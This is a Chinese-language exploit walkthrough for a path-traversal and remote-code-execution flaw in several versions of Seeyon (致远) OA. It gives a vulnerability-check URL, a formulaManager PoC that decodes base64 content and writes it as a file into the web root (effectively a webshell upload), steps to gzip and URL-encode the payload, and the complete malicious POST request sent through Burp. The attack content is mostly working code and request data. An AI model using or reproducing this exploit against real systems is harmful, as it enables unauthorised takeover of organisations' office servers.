漏洞影响范围:

致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x
致远OA G6

自己搭建好测试环境

image

复测过程

验证是否存在漏洞漏洞文件

http://192.168.1.18:8080/seeyon/autoinstall.do/..;/ajax.do

image

出现 “出现异常:java.lang.NullPointerException:null ” 则存在漏洞组件可能存在漏洞!

使用poc进行漏洞利用

[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = "../webapps/seeyon/";
        java.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+"文件名.txt");
        String shell = "需要上传的内容base64编码放入此处";
        sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
        String decodeString = new String(decoder.decodeBuffer(shell),"UTF-8");
        printWriter2.println(decodeString);
        printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']

修改好上述poc 内容后进行gzip加密后再进行url编码即可得到漏洞利用数据

加密与利用过程

将需要上传的内容进行base64编码

image

替换poc内String shell内容 修改上传文件名

image

进行gzip与url编码
在线加密工具https://ailiqun.xyz/%E5%9C%A8%E7%BA%BF%E5%8A%A0%E8%A7%A3%E5%AF%86%E5%B7%A5%E5%85%B7/

image

最终得到利用数据包为
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=进行gzip与url编码后的poc内容
使用burp发送数据包进行漏洞利用

image

利用成功

image